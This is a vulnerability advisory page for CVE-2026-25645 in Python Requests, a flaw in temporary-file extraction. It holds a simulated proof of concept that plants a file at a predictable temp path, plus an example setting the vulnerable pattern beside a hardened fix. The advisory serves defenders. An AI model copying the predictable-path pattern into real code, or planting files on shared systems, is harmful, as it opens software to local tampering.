Security Vulnerability Report
CVE-2026-25645 CVSS 4.4 MEDIUM

CVE-2026-25645

Published: 2026-03-25 17:16:53
Last Modified: 2026-03-30 14:23:16

Description

Requests is an HTTP library. Prior to version 2.33.0, the `requests.utils.extract_zipped_paths()` utility function uses a predictable filename when extracting files from zip archives into the system temporary directory. If the target file already exists, it is reused without validation. A local attacker with write access to the temp directory could pre-create a malicious file that would be loaded in place of the legitimate one. Standard usage of the Requests library is not affected by this vulnerability. Only applications that call `extract_zipped_paths()` directly are impacted. Starting in version 2.33.0, the library extracts files to a non-deterministic location. If developers are unable to upgrade, they can set `TMPDIR` in their environment to a directory with restricted write access.

CVSS Details

CVSS Score
4.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:python:requests:*:*:*:*:*:*:*:* - VULNERABLE
Python Requests < 2.33.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import os
import tempfile

# This PoC demonstrates the vulnerability scenario.
# It simulates an attacker creating a predictable file in the temp directory
# before the vulnerable application extracts the zip.

def attacker_simulation():
    # 1. Determine the temp directory
    temp_dir = tempfile.gettempdir()
    # 2. Predict the filename that the vulnerable function will generate
    # (Based on the hash of the zip content or predictable logic in older versions)
    predictable_filename = "vulnerable_extract_target_file.bin"
    full_path = os.path.join(temp_dir, predictable_filename)
    print(f"[+] Attacker targeting path: {full_path}")
    # 3. Create the malicious file
    with open(full_path, 'wb') as f:
        f.write(b"MALICIOUS_PAYLOAD_CONTROLLED_BY_ATTACKER")
    print("[+] Malicious file created successfully.")
    return full_path

def vulnerable_app_simulation(target_path):
    # This simulates the logic in requests.utils.extract_zipped_paths()
    # Check if file exists (The vulnerability: reusing without validation)
    if os.path.exists(target_path):
        print("[*] File found in temp dir. Reusing without extraction/validation.")
        with open(target_path, 'rb') as f:
            return f.read()
    else:
        print("[-] File not found. Extracting...")
        return b"LEGITIMATE_CONTENT"

# Execute simulation
malicious_path = attacker_simulation()
loaded_content = vulnerable_app_simulation(malicious_path)
print(f"[+] Content loaded by application: {loaded_content}")
```
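As an added example (not code from this record or from the requests project), the same scenario run against the mitigation the description names: a hardened extractor that writes into a fresh directory from `tempfile.mkdtemp()` (which honours `TMPDIR`) and never reuses a pre-existing file, side by side with the predictable-path pattern. The zip archive, the member name `cacert.pem` and the `shared_tmp` directory standing in for the world-writable temp directory are all constructed here.

```python
import io
import os
import tempfile
import zipfile

MEMBER = "cacert.pem"                       # constructed sample member name
LEGIT = b"-----BEGIN CERTIFICATE-----\nLEGIT\n-----END CERTIFICATE-----\n"

def build_sample_zip() -> bytes:
    """Constructed test input: a zip holding the one member the app loads."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(MEMBER, LEGIT)
    return buf.getvalue()

def extract_predictable(zip_bytes: bytes, shared_tmp: str) -> bytes:
    """Vulnerable pattern: fixed name in a shared temp dir, reused if present."""
    target = os.path.join(shared_tmp, MEMBER)
    if not os.path.exists(target):          # whatever is already there wins
        with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf, open(target, "wb") as f:
            f.write(zf.read(MEMBER))
    with open(target, "rb") as f:
        return f.read()

def extract_unpredictable(zip_bytes: bytes) -> bytes:
    """Hardened pattern: fresh private directory, always extract, never reuse."""
    # mkdtemp picks a random name and creates the dir with mode 0700 (under
    # TMPDIR if set), so another local user cannot pre-place a file here.
    target = os.path.join(tempfile.mkdtemp(prefix="extract-"), MEMBER)
    # O_EXCL turns a pre-existing file or symlink into an error, not a reuse.
    fd = os.open(target, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf, os.fdopen(fd, "wb") as f:
        f.write(zf.read(MEMBER))
    with open(target, "rb") as f:
        return f.read()

def demo(shared_tmp: str = None) -> tuple:
    """Plant a file at the predictable path, then run both extractors."""
    shared_tmp = shared_tmp or tempfile.mkdtemp(prefix="shared-")  # stands in for /tmp
    with open(os.path.join(shared_tmp, MEMBER), "wb") as f:
        f.write(b"PLANTED_BY_ANOTHER_LOCAL_USER")
    zip_bytes = build_sample_zip()
    return extract_predictable(zip_bytes, shared_tmp), extract_unpredictable(zip_bytes)

if __name__ == "__main__":
    vuln, fixed = demo()
    print("predictable path loaded:", vuln)   # the planted bytes
    print("hardened path loaded:   ", fixed)  # the archive member
```

Running it shows the predictable-path extractor returning the planted bytes while the hardened one returns the archive member; setting `TMPDIR` to a directory only the application user can write to removes the planting opportunity even for the old pattern.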

References

Patch: https://github.com/psf/requests/commit/66d21cb07bd6255b1280291c4fafb71803cdb3b7
Release Notes: https://github.com/psf/requests/releases/tag/v2.33.0
Vendor Advisory: https://github.com/psf/requests/security/advisories/GHSA-gc5v-m9x4-r6x2

Additional Record Data

Weakness: CWE-377 (Secondary source)
Secondary CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:N (base score 4.4 MEDIUM; exploitability 0.8, impact 3.6)
Primary CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N (base score 5.5 MEDIUM; exploitability 1.8, impact 3.6)
Affected Configuration: cpe:2.3:a:python:requests:*:*:*:*:*:*:*:* with versionEndExcluding 2.33.0
Record Status: Analyzed